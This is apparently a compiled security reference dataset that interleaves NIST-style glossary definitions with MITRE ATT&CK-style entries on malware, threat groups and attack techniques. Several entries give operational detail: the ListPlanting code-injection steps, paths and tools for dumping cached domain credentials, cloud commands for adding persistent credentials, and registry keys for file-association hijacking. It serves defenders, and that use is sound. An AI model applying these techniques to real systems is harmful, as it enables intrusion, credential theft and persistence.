Definition: Protocols that allow users to view, modify, and transfer/update PDA data from the PC or vice-versa. The two most common synchronization protocols are: Microsoft’s ActiveSync and Palm’s HotSync.

Term: certificate management
Definition: Process whereby certificates (as defined above) are generated, stored, protected, transferred, loaded, used, and destroyed.

Name: VNC
Type: attack-pattern
Description: Adversaries may use Valid Accounts to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.

VNC differs from Remote Desktop Protocol as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.

Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.

Term: Full Tunneling
Definition: A method that causes all network traffic to go through the tunnel to the organization.

Term: ZTA
Definition: A security model, a set of system design principles, and a coordinated cybersecurity and system management strategy based on an acknowledgement that threats exist both inside and outside traditional network boundaries. The zero trust security model eliminates implicit trust in any one element, component, node, or service and instead requires continuous verification of the operational picture via real-time information from multiple sources to determine access and other system responses.

Term: Challenge
Definition: For this paper, a currently difficult or impossible task that is either unique to cloud computing or exacerbated by it

Term: trustworthiness
Definition: Worthy of being trusted to fulfill whatever critical requirements may be needed for a particular component, subsystem, system, network, application, mission, business function, enterprise, or other entity.

Term: Authentication code
Definition: A keyed cryptographic checksum based on an approved security function (also known as a Message Authentication Code).

Term: advanced persistent threat
Definition: An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors including, for example, cyber, physical, and deception. These objectives typically include establishing and extending footholds within the IT infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization, or positioning itself to carry out these objectives in the future. The advanced persistent threat pursues its objectives repeatedly over an extended period; adapts to defenders’ efforts to resist it; and is determined to maintain the level of interaction needed to execute its objectives.

Term: Universal Mobile Telecommunications System (UMTS)
Definition: a third-generation (3G) mobile phone technologies standardized by the 3GPP as the successor to GSM.

Term: Plan of Actions and Milestones1
Definition: A document that identifies tasks needing to be accomplished. It details resources required to accomplish the elements of the plan, any milestones for meeting the tasks, and scheduled milestone completion dates.

Name: RATANKBA
Type: malware
Description: RATANKBA is a remote controller tool used by Lazarus Group. RATANKBA has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. RATANKBA has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines.

Term: Multifactor
Definition: A characteristic of an authentication system or an authenticator that requires more than one distinct authentication factor for successful authentication. MFA can be performed using a single authenticator that provides more than one factor or by a combination of authenticators that provide different factors. The three authentication factors are something you know, something you have, and something you are.

Term: information resources
Definition: The term 'information resources' means information and related resources, such as personnel, equipment, funds, and information technology.

Term: misconfiguration
Definition: An incorrect or suboptimal configuration of an information system or system component that may lead to vulnerabilities.

Term: multi-factor authentication
Definition: Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN, password), something you have (e.g., cryptographic identification device, token), or something you are (e.g., biometric). See authenticator.

Name: Additional Cloud Credentials
Type: attack-pattern
Description: Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure / Entra ID. These credentials include both x509 keys and passwords. With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.

In infrastructure-as-a-service (IaaS) environments, after gaining access through Cloud Accounts, adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP. This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.

Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code> API in AWS to add a password that can be used to log into the AWS Management Console for Cloud Service Dashboard. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. Cloud Accounts). For example, in Entra ID environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator. 

In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to Forge Web Credentials tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.

In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account. As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.

Term: public key certificate
Definition: A set of data that uniquely identifies a public key (which has a corresponding private key) and an owner that is authorized to use the key pair. The certificate contains the owner’s public key and possibly other information and is digitally signed by a Certification Authority (i.e., a trusted party), thereby binding the public key to the owner.

Term: TDEA
Definition: Triple Data Encryption Algorithm specified in FIPS 46-3

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions are expected to satisfy the following properties: 1. One-way: it is computationally infeasible to find any input that maps to any pre-specified output, and 2. Collision resistant: It is computationally infeasible to find any two distinct inputs that map to the same output.

Name: Cloud Service Dashboard
Type: attack-pattern
Description: An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, review findings of potential security risks, and run additional queries, such as finding public IP addresses and open ports.

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This also allows the adversary to gain information without manually making any API requests.

Name: ROCKBOOT
Type: malware
Description: ROCKBOOT is a Bootkit that has been used by an unidentified, suspected China-based group.

Name: ListPlanting
Type: attack-pattern
Description: Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.

List-view controls are user interface windows used to display collections of items. Information about an application's list-view settings are stored within the process' memory in a <code>SysListView32</code> control.

ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items. Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the <code>SysListView32</code> child of the victim process window (via Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or other Process Injection methods.

Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored <code>WriteProcessMemory</code> function. For example, an adversary can use the <code>PostMessage</code> and/or <code>SendMessage</code> API functions to send <code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, effectively copying a payload 2 bytes at a time to the allocated memory. 

Finally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to the <code>SysListView32</code> child of the process window, with the payload within the newly allocated buffer passed and executed as the <code>ListView_SortItems</code> callback.

Term: <em>s</em>
Definition: The standard deviation of a random variable =Öò(x-m)2f ( x )dx.

Term: Disk Imaging
Definition: Generating a bit-for-bit copy of the original media, including free space and slack space.
Also known as a bit stream image.

Term: Evaluated Products List
Definition: List of validated products that have been successfully evaluated under the National Information Assurance Partnership (NIAP) Common Criteria Evaluation and Validation Scheme (CCEVS). 
Rationale: EPL is no longer used. Product compliant list (PCL) is the replacement term.

Name: Cached Domain Credentials
Type: attack-pattern
Description: Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.

On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash. The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires Password Cracking to recover the plaintext password.

On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use Password Cracking to obtain the plaintext password. 

With SYSTEM or sudo access, the tools/utilities such as Mimikatz, Reg, and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.

Note: Cached credentials for Windows Vista are derived using PBKDF2.

Term: Approved entropy source
Definition: An entropy source that has been validated as conforming to [NIST SP 800-90B].

Term: key agreement
Definition: A (pair-wise) key-establishment procedure in which the resultant secret keying material is a function of information contributed by both participants, so that neither party can predetermine the value of the secret keying material independently of the contributions of the other party. Contrast with key transport.

Term: PIV Visual Credential Authentication (VIS)
Definition: An authentication mechanism where a human guard inspects the PIV Card and the person presenting it and makes an access control decision based on validity of the card and its correspondence with the presenter. This mechanism is deprecated.

Term: Network Intrusion Detection System
Definition: Software that performs packet sniffing and network traffic analysis to identify suspicious activity and record relevant information.

Term: security specification
Definition: The requirements for the security-relevant portion of the system.

Term: Access control system
Definition: A set of procedures and/or processes, normally automated, which allows access to a controlled area or to information to be controlled, in accordance with pre-established policies and rules.

Name: Cadelspy
Type: malware
Description: Cadelspy is a backdoor that has been used by APT39.

Term: Profile requirements
Definition: The properties or characteristics that shall be exhibited in FCKMSs in order to conform to, or comply with, this Profile.

Term: subject
Definition: An individual, process, or device that causes information to flow among objects or change to the system state. Also see object.

Term: approved cryptography
Definition: An encryption algorithm, hash function, random bit generator, or similar technique that is Federal Information Processing Standards (FIPS)-approved or NIST-recommended. Approved algorithms and techniques are either specified or adopted in a FIPS or NIST recommendation.

Term: Rivest-Shamir-Adleman
Definition: Rivest, Shamir, Adelman; an algorithm approved in [FIPS 186] for digital signatures and in [SP 800-56B] for key establishment.

Term: Keyed Hash Algorithm
Definition: Algorithm that creates a hash based on both a message and a secret key; also known as a hash message authentication code algorithm.

Term: Operating System (OS) Fingerprinting
Definition: Analyzing characteristics of packets sent by a target, such as packet headers or listening ports, to identify the operating system in use on the target.

Term: Owner
Definition: For a static key pair, the entity that is associated with the public key and authorized to use the private key. For an ephemeral key pair, the owner is the entity that generated the public/private key pair. For a symmetric key, the owner is any entity that is authorized to use the key.

Name: Unix Shell
Type: attack-pattern
Description: Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

Some systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell.

Name: CloudDuke
Type: malware
Description: CloudDuke is malware that was used by APT29 in 2015.

Term: plan of action and milestones
Definition: A document that identifies tasks that need to be accomplished. It details resources required to accomplish the elements of the plan, milestones for meeting the tasks, and the scheduled completion dates for the milestones.

Term: Sponsor (of a key)
Definition: A human entity that is responsible for managing a key for the non-human entity (e.g., device, application or process) that is authorized to use the key.

Name: Operation CuckooBees
Type: campaign
Description: Operation CuckooBees was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of Operation CuckooBees, which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed Operation CuckooBees was conducted by actors affiliated with Winnti Group, APT41, and BARIUM.

Term: authentication protocol
Definition: A defined sequence of messages between a Claimant and a Verifier that demonstrates that the Claimant has possession and control of a valid token to establish his/her identity, and optionally, demonstrates to the Claimant that he or she is communicating with the intended Verifier.

Name: Cloud Accounts
Type: attack-pattern
Description: Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or Phishing. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.

A variety of methods exist for compromising cloud accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, conducting Password Spraying attacks, or attempting to Steal Application Access Tokens. Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a Trusted Relationship between service providers and their customers.

Term: Output Block
Definition: A data block that is an output of either the forward cipher function or the inverse cipher function of the block cipher algorithm.

Term: CSF Target Profile
Definition: A part of an Organizational Profile that specifies the desired Core outcomes that an organization has selected and prioritized for achieving its cybersecurity risk management objectives.

Term: CSF Core
Definition: A taxonomy of high-level cybersecurity outcomes that can help any organization manage its cybersecurity risks. Its components are a hierarchy of Functions, Categories, and Subcategories that detail each outcome.

Term: Node
Definition: An individual system within the blockchain network.

Term: <em>Conditioning (of noise source output)</em>
Definition: A method of processing the raw data to reduce bias and/or ensure that the entropy rate of the conditioned output is no less than some specified amount.

Term: malware
Definition: See Malicious Code.

Term: Operational storage
Definition: A function in the lifecycle of keying material; the normal storage of operational keying material during its cryptoperiod.

Term: FIPS-validated cryptography
Definition: A cryptographic module validated by the Cryptographic Module Validation Program (CMVP) to meet requirements specified in FIPS Publication 140-3 (as amended). As a prerequisite to CMVP validation, the cryptographic module is required to employ a cryptographic algorithm implementation that has successfully passed validation testing by the Cryptographic Algorithm Validation Program (CAVP). See NSA-approved cryptography.

Term: security control baseline
Definition: The set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system.

Term: Small Computer System Interface
Definition: A magnetic media interface specification. Small Computer System Interface.

Term: Electromagnetic Interference
Definition: An electromagnetic disturbance that interrupts, obstructs, or otherwise degrades or limits the effective performance of electronics/electrical equipment.

Term: removable media device
Definition: A system component that can be inserted into and removed from a system, and that is used to store data or information (e.g., text, video, audio, and/or image data). Such components are typically implemented on magnetic, optical, or solid-state devices (e.g., floppy disks, compact/digital video disks, flash/thumb drives, external hard disk drives, and flash memory cards/drives that contain nonvolatile memory).

Term: Transducer Capabilities
Definition: Capabilities that provide the ability for computing devices to interact directly with physical entities of interest. The two types of transducer capabilities are sensing and actuating.

Term: Access Complexity
Definition: a means to convey the level of difficulty required for an attacker to exploit a vulnerability once the target system is identified.

Term: risk executive (function)
Definition: An individual or group within an organization that helps to ensure that: (i) security risk-related considerations for individual information systems, to include the authorization decisions, are viewed from an organization-wide perspective with regard to the overall strategic goals and objectives of the organization in carrying out its missions and business functions; and (ii) managing information system-related security risks is consistent across the organization, reflects organizational risk tolerance, and is considered along with other organizational risks affecting mission/business success.

Name: Dynamic API Resolution
Type: attack-pattern
Description: Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various Native API functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.

API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.

To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to Software Packing, dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.

Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of Deobfuscate/Decode Files or Information during execution).

Term: Laplace mechanism
Definition: An algorithmic primitive for differential privacy that adds random noise sampled from the Laplace distribution to the output of a query.

Term: SHA-1
Definition: The Secure Hash Algorithm defined in Federal Information Processing Standard 180-1.

Name: APT28
Type: intrusion-set
Description: APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165. This group has been active since at least 2004.

APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations. Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.

Term: Weapons System
Definition: A combination of one or more weapons with all related equipment, materials, services, personnel, and means of delivery and deployment (if applicable) required for self-sufficiency.

Term: adversarial example
Definition: A modified testing sample that induces misclassification or misbehav­ior of a machine learning model at deployment time.

Term: penetration testing
Definition: A test methodology in which assessors, typically working under specific constraints, attempt to circumvent or defeat the security features of a system.

Name: KOCTOPUS
Type: malware
Description: KOCTOPUS's batch variant is loader used by LazyScripter since 2018 to launch Octopus and Koadic and, in some cases, QuasarRAT. KOCTOPUS also has a VBA variant that has the same functionality as the batch version.

Name: Query Registry
Type: attack-pattern
Description: Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

The Registry contains a significant amount of information about the operating system, configuration, software, and security. Information can easily be queried using the Reg utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from Query Registry during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Term: NC
Definition: A randomly generated value used to defeat “playback” attacks in communication protocols. One party randomly generates a nonce and sends it to the other party. The receiver encrypts it using the agreed upon secret key and returns it to the sender. Because the sender randomly generated the nonce, this defeats playback attacks because the replayer cannot know in advance the nonce the sender will generate. The receiver denies connections that do not have the correctly encrypted nonce.

Term: Security Capability
Definition: A set of mutually reinforcing security controls implemented by technical, physical, and procedural means. Such controls are typically selected to achieve a common information security-related purpose.

Term: Control Cell
Definition: A central location for exercise coordination, typically in a separate area from the exercise participants.

Term: Security Status
Definition: See Security Posture.

Term: sampling
Definition: The process of taking samples of something for the purpose of analysis.

Term: <em>p</em>
Definition: 3.14159… unless defined otherwise for a specific test.

Term: non-repudiation
Definition: In a general information security context, assurance that the sender of information is provided with proof of delivery, and the recipient is provided with proof of the sender's identity, so neither can later deny having process the information .

Term: Component specification
Definition: One of the individual specifications that comprises SCAP.

Term: Orchestrator
Definition: A tool that enables DevOps personas or automation working on their behalf to pull images from registries, deploy those images into containers, and manage the running containers. Orchestrators are also responsible for monitoring container resource consumption, job execution, and machine health across hosts.

Term: security requirement
Definition: A requirement levied on an information system or an organization that is derived from applicable laws, executive orders, directives, regulations, policies, standards, procedures, or mission/business needs to ensure the confidentiality, integrity, and availability of information that is being processed, stored, or transmitted.

Term: Usability
Definition: The extent to which a product can be used by specified users to achieve specified goals with effectiveness, efficiency, and satisfaction in a specified context of use.

Term: hash function
Definition: <p>A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions satisfy the following properties</p><p>1. One-way — It is computationally infeasible to find any input that maps to any pre-specified output.</p><p>2. Collision-resistant — It is computationally infeasible to find any two distinct inputs that map to the same output.</p>

Term: design margin
Definition: A spare amount or measure or degree allowed or given for contingencies or special situations. The allowances carried to account for uncertainties and risks.

Term: Key-derivation function
Definition: A function that, with the input of a cryptographic key and other data, generates a binary string, called keying material.

Term: Scenario
Definition: A sequential, narrative account of a hypothetical incident that provides the catalyst for the exercise and is intended to introduce situations that will inspire responses and thus allow demonstration of the exercise objectives.

Name: Change Default File Association
Type: attack-pattern
Description: Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command</code>. For example: 

* <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>
* <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>
* <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.

Term: RVC
Definition: RPKI Validation Cache provides Validated ROA Payload (VRP) and public router keys.

Term: Coder-Decoder
Definition: coder/decoder, which converts analog voice into digital data and back again, and may also compress and decompress the data for more efficient transmission.

Name: DarkHydrus
Type: intrusion-set
Description: DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks.

Term: access control
Definition: To ensure that an entity can only access protected resources if they have the appropriate permissions based on the predefined access control policies.

Term: Key agreement primitive
Definition: A primitive algorithm used in a key-agreement scheme specified in SP 800-56A, 3 or in SP 800-56B.

Term: system component
Definition: A discrete, identifiable information technology asset (hardware, software, firmware) that represents a building block of a system. System components include commercial information technology products.

Term: time scale
Definition: An agreed upon system for keeping time. All time scales use a frequency source to define the length of the second, which is the standard unit of time interval. Seconds are then counted to measure longer units of time interval, such as minutes, hours, or days. Modern time scales, such as UTC, define the second based on an atomic property of the cesium atom, and thus standard seconds are produced by cesium oscillators. Earlier time scales (including earlier versions of Universal Time) were based on astronomical observations that measured the frequency of the Earth’s rotation.

Term: Current Profile
Definition: The ‘as is’ state of system cybersecurity.

Term: <em>Pn</em>
Definition: Block of data representing Plaintext n

Term: internal network
Definition: A network where: (i) the establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors; or (ii) cryptographic encapsulation or similar security technology provides the same effect. An internal network is typically organization-owned, yet may be organization-controlled while not being organization-owned.

Term: key-establishment key pair
Definition: A public key and its corresponding private key; a key pair is used with a public key algorithm.

Term: Resilience Requirements
Definition: The business-driven availability and reliability characteristics for the manufacturing system that specify recovery tolerances from disruptions and major incidents.

Term: shared control
Definition: A security or privacy control that is implemented for an information system in part as a common control and in part as a system-specific control. See hybrid control.

Name: SameCoin
Type: malware
Description: SameCoin is a multi-platform wiper with Windows and Android versions that has been used by WIRTE to target entities in the Middle East including in Israel.

Term: specification
Definition: A document that specifies, in a complete, precise, verifiable manner, the requirements, design, behavior, or other characteristics of a system or component and often the procedures for determining whether these provisions have been satisfied. See specification requirement.

Term: level of assurance
Definition: OMB Memorandum M-04-04 describes four levels of identity assurance and references NIST technical standards and guidelines, which are developed for agencies to use in identifying the appropriate authentication technologies that meet their requirements.

Term: Ingress Filtering
Definition: Filtering of incoming network traffic.

Term: digital signature
Definition: An asymmetric key operation in which the private key is used to digitally sign data, and the public key is used to verify the signature. Digital signatures provide authenticity protection, integrity protection, and non-repudiation support but not confidentiality or replay attack protection.

Term: mechanism
Definition: The fundamental processes involved in or responsible for an action, reaction, or other natural phenomenon.

Term: Post Office Protocol (POP)
Definition: A mailbox access protocol defined by IETF RFC 1939. POP is one of the most commonly used mailbox access protocols.

Name: Lslsass
Type: tool
Description: Lslsass is a publicly-available tool that can dump active logon session password hashes from the lsass process.

Term: IS
Definition: The term 'information security' means protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide integrity, confidentiality, and availability.

Term: privacy posture
Definition: The privacy posture represents the status of the information systems and information resources (e.g., personnel, equipment, funds, and information technology) within an organization based on information assurance resources (e.g., people, hardware, software, policies, procedures) and the capabilities in place to comply with applicable privacy requirements and manage privacy risks and to react as the situation changes.

Term: network interconnection
Definition: A physical or virtual communications link between two or more networks operated by different organizations or operated within the same organization but within different authorization boundaries.

Term: Mail User Agent (MUA)
Definition: A mail client application used by an end user to access a mail server to read, compose, and send email messages. Common MUAs include Microsoft Outlook and Mozilla Thunderbird.

Term: jailbreak
Definition: A direct prompting attack intended to circumvent restrictions placed on model outputs, such as circumventing refusal behaviour to enable misuse.

Term: compromise
Definition: The unauthorized disclosure, modification, substitution, or use of sensitive data (e.g., keying material and other security related information).

Name: HiddenWasp
Type: malware
Description: HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.

Term: Domain parameter
Definition: The parameters used with a cryptographic algorithm that are common to a domain of users.

Term: key establishment
Definition: A function in the lifecycle of keying material; the process by which cryptographic keys are securely established among cryptographic modules using manual transport methods (e.g., key loaders), automated methods (e.g., key-transport and/or key-agreement protocols), or a combination of automated and manual methods.

Term: Event Reduction
Definition: Removing unneeded data fields from all log entries to create a new log that is smaller.

Term: bit string
Definition: An ordered sequence of zeros and ones.

Term: Function
Definition: Primary unit within the Cybersecurity Framework. Exhibits basic cybersecurity activities at their highest level.

Term: event
Definition: Any observable occurrence on a manufacturing system. Events can include cybersecurity changes that may have an impact on manufacturing operations (including mission, capabilities, or reputation).

Term: Normalization
Definition: The conversion of information into consistent representations and categorizations.

Term: Network Time Protocol
Definition: Used in networks of all types and sizes for time synchronization of servers, workstations, and other networked equipment.

Term: Authenticated Decryption
Definition: The function of GCM in which the ciphertext is decrypted into the plaintext, and the authenticity of the ciphertext and the AAD is verified.

Term: trust anchor
Definition: 1. An authoritative entity for which trust is assumed. In a PKI, a trust anchor is a certification authority, which is represented by a certificate that is used to verify the signature on a certificate issued by that trust-anchor. The security of the validation process depends upon the authenticity and integrity of the trust anchor’s certificate. Trust anchor certificates are often distributed as self-signed certificates. 2. The self-signed public key certificate of a trusted CA.

Name: HermeticWiper
Type: malware
Description: HermeticWiper is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.

Term: Model
Definition: A very detailed description or scaled representation of one component of a larger system that can be created, operated, and analyzed to predict actual operational characteristics of the final produced component.

Term: Advanced Encryption Standard
Definition: A U.S. Government-approved cryptographic algorithm that can be used to protect electronic data. The AES algorithm is a symmetric block cipher that can encrypt (encipher) and decrypt (decipher) information.

Term: concern (system)
Definition: Interest in a system relevant to one or more of its stakeholders.

Term: over-the-network keying (OTNK)
Definition: A set of data items and messages (termed OTNK Service Messages) that a KMI- aware User Device processes to receive identity specific and possibly cryptographically protected KMI Products and Services contained in CMS packages.

Term: federated identifier
Definition: The combination of a subject identifier within an assertion and an identifier for the IdP that issued that assertion. When combined, these pieces of information uniquely identify the subscriber in the context of a federation transaction.

Term: Entity authentication
Definition: The process of providing assurance about the identity of an entity interacting with a system (e.g., to access a resource). Sometimes called identity authentication.

Term: security relevance
Definition: Functions or mechanisms that are relied upon, directly or indirectly, to enforce a security policy that governs confidentiality, integrity, and availability protections.

Term: Final Checklist
Definition: Checklist approved by NIST for placement on the repository.

Term: Wireless Fidelity (WiFi)
Definition: A term describing a wireless local area network that observes the IEEE 802.11 protocol.

Term: nonce
Definition: A value that is used only once.

Name: POWRUNER
Type: malware
Description: POWRUNER is a PowerShell script that sends and receives commands to and from the C2 server.

Name: External Proxy
Type: attack-pattern
Description: Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.

External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.

Term: chief information security officer
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. 
[Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: NFT
Definition: An owned, transferable, and indivisible data record that is a digital representation of a physical or virtual linked asset. The data record is created and managed by a smart contract on a blockchain.

Term: Auditor
Definition: A member of the organization who inspects reports and risk assessments from one or more analyzers as well as organization-specific criteria to ensure that an app meets the security requirements of the organization.

Term: RBG seed
Definition: A secret value that is used to initialize a process (e.g., a DRBG). Also see RBG seed.

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed length bit string. Approved hash functions are designed to satisfy the following properties:
1.  (One-way) It is computationally infeasible to find any input that maps to any pre-specified output, and
2.  (Collision resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.
Approved hash functions are specified in FIPS 180-3.

Term: Presentation Attack Detection (PAD)
Definition: Automated determination of a presentation attack. A subset of presentation attack determination methods, referred to asliveness detection, involve measurement and analysis of anatomical characteristics or involuntary or voluntary reactions, in order to determine if a biometric sample is being captured from a living subject present at the point of capture.

Name: Impacket
Type: tool
